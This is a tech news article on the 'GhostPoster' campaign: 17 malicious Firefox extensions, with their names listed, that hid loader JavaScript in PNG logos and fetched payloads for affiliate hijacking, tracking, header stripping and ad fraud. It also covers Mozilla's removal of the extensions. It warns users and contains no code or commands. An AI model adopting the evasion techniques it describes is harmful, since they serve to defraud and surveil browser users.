- Koi Security discovered 17 malicious Firefox extensions that concealed backdoors and tracking code, downloaded more than 50,000 times.
- The extensions extracted payloads from remote servers, hijacked affiliate links, injected trackers, stripped security headers, and activated ad fraud mechanisms.
- Mozilla has removed all affected add-ons and updated detection systems; users should uninstall them and secure accounts
More than a dozen Firefox extensions have been found to be malicious, implementing backdoors and keeping track of users’ browsing habits, experts have warned.
That’s according to security researchers at Koi Security, who named the campaign “GhostPoster” and said some of these extensions have a rather unique way of harvesting malicious code.
In total, these extensions have been downloaded more than 50,000 times.
Hijacking Affiliate Links
Here is the full list of those found so far:
Free VPN forever
screenshot-recorded-easy
best weather forecast
crxmouse-gesture
fast site loader and cache
free mp3 downloader
google-translate-right-click
google-translator-esp
Global VPN
dark reader for ff
translator-gbbd
I like the weather
extension-google-translate-pro
谷歌-翻译
libretv-watch-free-videos
stop ads
right click-google-translate
Some of these extensions actually store malicious JavaScript code in the PNG logo. The code serves as instructions on how to download the main payload from a remote server. To make detection and attribution more difficult, the attackers forced extensions to download the main payload 10% of the time.
The main payload can do all sorts of things. Above all, it hijacks affiliate links on major e-commerce sites, thereby stealing money directly from content creators.
Then it injects Google Analytics tracking into every page the user visits and removes security headers from all HTTP responses.
Finally, it can bypass CAPTCHA using three separate mechanisms and inject invisible iframes, mainly used for ad fraud, click fraud and tracking. These iframes self-destruct after about 15 seconds.
While stealing money from affiliates and monitoring user behavior is serious business, researchers warned that the campaign could become even more destructive at any time if attackers decide to start harvesting passwords or redirecting users to fake banking login pages and similar phishing sites.
After the news broke, Mozilla investigated the report and decided to remove all discovered extensions from its browser store.
“Our add-ons team has investigated this report and has therefore taken action to remove all of these extensions from AMO,” the company told BleepingComputer. “We have updated our automated systems to detect and block extensions using similar attacks now and in the future. We continue to improve our systems as new attacks emerge.”
If you are using one of these extensions, you should remove it immediately and secure your critical accounts.
Via BeepComputer
The best antivirus for every budget
Follow TechRadar on Google News And add us as your favorite source to get our news, reviews and expert opinions in your feeds. Make sure to click the Follow button!
And of course you can too follow TechRadar on TikTok for news, reviews, unboxings in video form and receive regular updates from us on WhatsApp Also.
